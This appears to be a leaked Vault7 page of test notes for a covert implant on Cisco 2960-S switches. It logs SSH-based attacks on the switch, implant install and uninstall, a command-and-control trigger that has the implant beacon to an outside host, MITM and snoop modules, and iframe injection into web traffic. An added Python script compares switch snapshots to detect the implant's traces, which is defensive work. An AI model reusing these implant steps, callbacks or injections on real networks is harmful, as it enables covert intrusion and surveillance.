Vault7: CIA Hacking Tools Revealed
Owner: User #71467
Aquaman-5h-Without-Snooping Test Notes
Xetron redelivered Aquaman-5h without snooping as an interim solution to EAR 5244. Plan is to run through Smoke tests from previous Aquaman-5h testing, as well as verify that the bug from EAR 5244 is not reproducible.
Testing Summary
- 2960S crashes and reloads if show stacks is issued during a reinstall of hg (after initial install with leave_behind and uninstall)
- Confirmed snoop not enabled
Progress / Notes
- Run through HG Base Smoke Tests
  - Install/Uninstall without leave-behind
    - Establish baseline values for clean target device - skipped because we already have that data from previous testing
    - IAC attack - successful, received codes were 125, 60, 159 which are in the readme
      - Edited target-aliases to use target address 172.31.255.14
      - Edited target-aliases to use correct proc_id
    - HG upload - hg_start, left 1s delay between packets
      - HG uploaded successfully - result good
    - Establish CT Session with HG according to readme
      - Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
      - Ran ./prep-ct.sh
      - Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
      - Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
        - 0011.bb89.21c4 is MAC address of 192.168.21.1
      - Successful HG comms
    - Uninstall according to readme
      - device uninstall_hg -mp -f - Successful
      - Memory back down, no syslog messages, no crash
  - Install/Uninstall with leave-behind
    - Reloaded switch to start with a clean switch
    - SSHIAC attack - successful, received codes were in readme
    - HG upload - hg_start_leave_behind - delay of 1s between packets - Successful
    - Collected a show tech
    - Establish CT Session with HG according to readme
      - Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
      - Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
        - 0011.bb89.21c4 is MAC address of 192.168.21.1
      - Successful HG comms
    - Uninstall according to readme - successful, no anomalies seen
      - Did broad on remote - ok
    - hg_start to reinstall
      - While hg was reinstalling, I typed show stacks on switch - 1s later the switch crashed with the following error:
        Instruction Access Exception (0x0400)!
        Not sure if this was related to entering show stacks while hg reinstall was taking place or if that was a coincidence
    - Attempt to reproduce the crash
      - SSHIAC attack
      - Changed interpacket time to 0.1s
      - hg_start_leave_behind - successful
      - Establish CT Session
      - Uninstall according to readme - successful, no anomalies seen
      - hg_start to reinstall
        - No show commands entered - successful reinstall
      - Establish CT Session
      - Uninstall hg - successful
      - SSHIAC attack
      - hg_start_leave_behind to reinstall
        - this time, enter show stacks during install
        - no crashes - output of show stacks does show the artifacts, this is a known issue
      - Could not establish comms - reloading switch and going to try to repeat again
      - Reloaded switch
      - SSHIAC attack
      - hg_start_leave_behind
      - Establish CT session
      - device hg_uninstall -mp -f
      - hg_start_leave_behind - I entered show stacks during install and it crashed again
- Command and Control
  - Establish CT session and verify versions/capabilities
    - Reload switch to start with clean target
    - SSHIAC attack
    - hg_start
    - Established CT session
    - ilm show - ilm version 3.8.0
    - device get_uid - 1ce85d68a280
    - beacon show - beacon not enabled for this op
    - capability show -v
      - baseline version 3.3.0
      - lists all modules
  - Basic command and control
    - module show - modules running
    - module stop Trigger - success
    - module start Trigger.mod - success
    - ilm refresh - success
    - module show - success - Trigger module running
    - Hit tab key to verify output of available commands
      - mitm present, collect present
    - dns show, web show, https show - startup delay set to 32850k days - no snoop
    - dns get_snooped_host_list_client 0 100 - no snooped hosts even though seeds running
- Boundary Test
  - Run through list in HG Base Smoke Test Procedure - all failed gracefully, did not attempt to start snoop
  - Establish CT session and verify versions/capabilities
- CI Profile
  - Collect output for comparison - collected output in new files, will compare to previous test output
    - 29.66712 MB more Used memory with HG installed
    - Observed same spikes in CPU during SSHIAC attack, HG upload and SSL handshake as observed in previous testing
    - No change to file system
    - Show tech - observed known show stacks and show controllers artifacts
    - Show tech after hg uninstall - output of show tech platform tcam util asic all has a higher number for one value - IPv4 security aces went from 36 to 284 for ASIC 0 and ASIC 1 - need to test this further
    - Show tech with hg - no output for remote command all show vtp status, whereas there is output without hg and after hg uninstall. Need to test this further.
  - Added to Rancid and ran once with HG, then uninstalled hg, reloaded switch, and ran rancid again to compare
    - RANCID rev 1.3 with HG, rev 1.5 without - no differences
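The CI Profile comparison above (memory used, TCAM ACE counts, sections that disappear from show tech) is the kind of baseline diff a defender can automate for a switch. This is an added example, not part of the original notes or of the tooling they describe; the snapshot lines are constructed and simplified stand-ins rather than real Cisco show output, and the 10 MB memory tolerance is an assumed value.

```python
import re

# Constructed, simplified stand-ins for two diagnostic snapshots of one switch;
# NOT real Cisco "show" output. Only the fields parsed below matter.
BASELINE = """\
Processor Pool Total: 100000000 Used: 40000000 Free: 60000000
asic 0 ipv4 security aces: 36
asic 1 ipv4 security aces: 36
show vtp status: VTP Version 2
"""
SUSPECT = """\
Processor Pool Total: 100000000 Used: 71104000 Free: 28896000
asic 0 ipv4 security aces: 284
asic 1 ipv4 security aces: 284
"""

def parse_snapshot(text):
    """Extract the comparable fields from one snapshot into a flat dict."""
    fields = {}
    m = re.search(r"Used:\s*(\d+)", text)
    if m:
        fields["memory_used_bytes"] = int(m.group(1))
    for asic, count in re.findall(r"asic (\d+) ipv4 security aces:\s*(\d+)", text):
        fields[f"asic{asic}_ipv4_security_aces"] = int(count)
    # A section present in the baseline but absent later is itself a finding
    # (the notes record "show vtp status" output vanishing while hg was loaded).
    fields["has_vtp_status"] = "show vtp status" in text
    return fields

def compare(baseline, suspect, mem_threshold_mb=10.0):
    """Return findings where the suspect snapshot departs from the baseline.
    mem_threshold_mb is an assumed tolerance for normal memory jitter."""
    b, s = parse_snapshot(baseline), parse_snapshot(suspect)
    findings = []
    delta_mb = (s.get("memory_used_bytes", 0) - b.get("memory_used_bytes", 0)) / 2**20
    if delta_mb > mem_threshold_mb:
        findings.append(f"memory used grew by {delta_mb:.2f} MB")
    # TCAM ACE counts should be identical for an unchanged configuration.
    for key in sorted(k for k in b if k.endswith("_aces")):
        if s.get(key) != b[key]:
            findings.append(f"{key} changed {b[key]} -> {s.get(key)}")
    if b["has_vtp_status"] and not s["has_vtp_status"]:
        findings.append("show vtp status output missing from suspect snapshot")
    return findings

if __name__ == "__main__":
    print("\n".join(compare(BASELINE, SUSPECT)) or "no differences")
```

In practice the two inputs would be the saved show tech (or RANCID) captures taken before and after the period under review.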
- SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure
  - Start with a clean, reloaded 2960-S
  - SSHIAC attack and HG install
  - Established CT session
  - Completed module control test - stop, start - did not complete module delete and reload test
  - Did not test module persistence
  - Created SMITE rule
    - Iframe is injected into web page, viewed in source URL, however Windex server says all sessions used. Something wrong with Windex.